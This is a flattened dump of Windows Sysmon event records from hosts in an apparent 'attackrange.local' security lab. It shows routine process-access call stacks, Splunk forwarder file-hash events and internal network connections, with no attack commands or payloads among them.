07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RP
CRT4.dll+1ae1c 10341000x80000000000000001048716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:54.056{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001048781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.932{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=928FAA5DB8BF00BD01F97EB80A00D2BE,SHA256=752ED4C212EDFEC16417BCD06542701C93282B9A371EFDDF3BD73E5C79056F4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.932{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B3D5AE835858E906D1E72577C6F345D4,SHA256=81B9B52F606582EF0BAB76BDDEAC11B5A054E348BD2107479BC5BBEF4E1E03B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.850{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B46235BBF6FB232F05239AC6CB33992C,SHA256=BA61B8D7DC1E29D54D5373E347D10885959FD9A8A449391065E235824CBAC85D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807500Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:55.260{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19087064AD845FEDAA95272526C7C71C,SHA256=4DB61CDE05ADB91824D1743843D9B440D039D51BD08A590530B8341BCA50339C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.186{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F762A63424B8E7E86CC6AF4A06F0FF1,SHA256=D6AF0D3CA45138993C73628F175ECF196F8F406EA7F650F0D30297323FE5166A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:55.050{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.033{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.033{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:46.678{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51017-false10.0.1.12-8000- 10341000x80000000000000001048773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.018{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+105f4|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.003{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001048771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:55.003{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:56.968{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:56.869{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D59BF9ED7B7C4C0C9B9539D038A37C2,SHA256=CA8578E4A6548C5C68AA9AFC6F23FE964EFB55539FCDA63A29D38FA9C06E0257,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:56.276{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=571A4A3D0E6B0379828F9ED51E02749E,SHA256=A6BFE5321D8A95DD9912D14A422074C8A99979E6904E2BA17D097696A8B562C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:57.899{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A7734344EC87F44C9C2C8A1F1A8616A,SHA256=6CDD27BD15049729CD815907955203C7BE5411BB6783258A404394C066D5FD5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807502Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:57.276{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4FB04FE4E658C416367F9793EAFED7A,SHA256=84A230688B2B3714868FFFE070E95CB4C77C26A4BC2329E0687F7AE7B56E043F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:58.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0609A3DE334A7AFA6128EBE90BE1311,SHA256=CFC63BA5EF5394AA544344811E9DD2222161E02A167183F34438D7611825BC7B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807503Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:58.276{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=291F40FF7FCE69FE0D5D89A8B00CC0A1,SHA256=C58D44F35D1EDA8BA2358820DE0A8399B0B260FCFBE9DD496499D66B86D67014,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:50.491{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51018-false10.0.1.12-8089- 23542300x80000000000000001048845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.948{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE7FF0EF0C0237ECC32E18168822D32A,SHA256=7D1AD210594D3EEC7FAEB8E520B612B571D3315C9EA1E003ED65ED0E7CDF6DC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807504Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:59.276{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=166424C525B26E8E0ECB797579B4E4A3,SHA256=C2DB54D3C1ADD651D81DF8F1A6E031AA22BB778775E39DFE4639D52495A0571F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:59.712{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64C12F212C53A965A41605530F9276A6,SHA256=6FAAA911B586C129E8A65E32B1E0DD013C8ABDC32520BB1FA9CCC1AE392F3983,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:59.596{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 